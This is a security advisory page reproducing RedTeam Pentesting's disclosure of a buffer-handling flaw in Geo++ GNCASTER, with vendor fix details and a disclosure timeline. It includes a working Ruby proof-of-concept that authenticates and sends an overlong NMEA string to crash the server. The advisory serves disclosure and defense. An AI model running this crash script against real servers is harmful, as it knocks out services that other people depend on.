|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 7003 CVE : CVE-2010-0553 CWE : CWE-20 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Available : Yes Credit : RedTeam Published : 08.02.2010
Advisory Content : Advisory: Geo++(R) GNCASTER: Insecure handling of NMEA-data During a penetration test, RedTeam Pentesting discovered that the GNCaster software does not handle NMEA-data correctly. An attacker that has valid login credentials can use this to crash the server software or potentially execute code on the server. Details ======= Product: Geo++(R) GNCASTER Affected Versions: <= 1.4.0.7 Fixed Versions: 1.4.0.8 Vulnerability Type: Memory corruption Security Risk: medium Vendor URL: http://www.geopp.de Vendor Status: notified Advisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2010-002 Advisory Status: published CVE: TBA CVE URL: TBA Introduction ============ "Geo++(R) GNCASTER is the Geo++ implementation of a NTRIP caster. NTRIP is a protocol within RTCM to provide GNSS information via Internet." (from the vendor's homepage) More Details ============ After logging in, the GNCaster server software allows the user to receive data streams. For some of these streams the user can send so-called NMEA-data to the server to specify the user's geographical position. If an attacker sends a long data string, the server software crashes. RedTeam Pentesting believes it is also possible to exploit this vulnerability to execute code on the server. Proof of Concept ================ The following ruby script can be used to crash the GNCaster server: ------------------------------------------------------------------- #!/usr/bin/env ruby ###################################### # # # RedTeam Pentesting GmbH # # kontakt (at) redteam-pentesting (dot) de [email concealed] # # http://www.redteam-pentesting.de # # # ###################################### require 'socket' require 'base64' if ARGV.length < 3 then puts "USAGE: %s host:port user:password stream" % __FILE__ puts "Example: %s 127.0.0.1:2101 testuser:secret /0001" % __FILE__ puts exit end host, port = ARGV[0].split(':') pw, stream = ARGV[1..2] begin puts "requesting stream %s" % stream.inspect sock = TCPSocket.new(host, port.to_i) sock.write("GET %s HTTP/1.1\r\n" % stream) sock.write("Authorization: Basic %s\r\n" % Base64.encode64(pw).strip) sock.write("\r\n") response = sock.readline puts "server response: %s" % response.inspect puts "sending modified nmea data" sock.write("$GP" + "A" * 2000 + "GGA,134047.00,5005.40000000,N,00839.60000000," + "E,1,05,0.19,+00400,M,47.950,M,,*69\r\n") puts "done" end ------------------------------------------------------------------- Workaround ========== A vulnerable server could be protected from this vulnerability by an application layer firewall that filters overly long NMEA-data. Fix === Update GNCASTER to version 1.4.0.8. Security Risk ============= As an attacker needs valid user credentials for this attack, the risk of this vulnerability is regarded as medium. If streams that use NMEA-data are publicly available, the risk should be considered as high. History ======= 2009-07-07 Vulnerability identified during a penetration test 2009-07-14 Meeting with customer 2009-12-01 Vendor releases fixed version 2010-01-27 Advisory released RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at http://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 963-1300 Dennewartstr. 25-27 Fax : +49 241 963-1304 52068 Aachen http://www.redteam-pentesting.de/ Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iQEVAwUBS2A0d9G/HXWsgFSuAQLv5wf/e6at3LCI4iXgxe4v/nJz3c/6b36EONWe ZdpegZFmIrbH4ywRS3A0BzvOXk0qNixHWPDrqMpthjRRM8TDEHRv4QY8fZC53DZa QvwtVOsrkMAU/VgUWzdrKLZ6dKEAZUpfANoIpaStASqKviC0QjukwAEipkQD1rPt pZTJasgoDBZ+fKu1fT7NkOrxrOloXVhr2KRRdt6OzfuYpYBryPpAztywGy8kvIId zwHf7AbhSPbHPX8gyXt1U/quC7InOhx8oE6Z7DsP3KJ8PgfQQ6q1rKAuXkB8X+/y FFF1fCYbu+nEDD7qzf3r72yDLvBfjCvqKmKn/mvDi+UilXVHZCAHkw== =5glG -----END PGP SIGNATURE----- References : http://xforce.iss.net/xforce/xfdb/55975
http://www.securityfocus.com/archive/1/archive/1/509197/100/0/threaded
http://www.redteam-pentesting.de/en/advisories/rt-sa-2010-002/-geo-r-gncaster-insecure-handling-of-nmea-data
http://secunia.com/advisories/38323
http://osvdb.org/62012  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |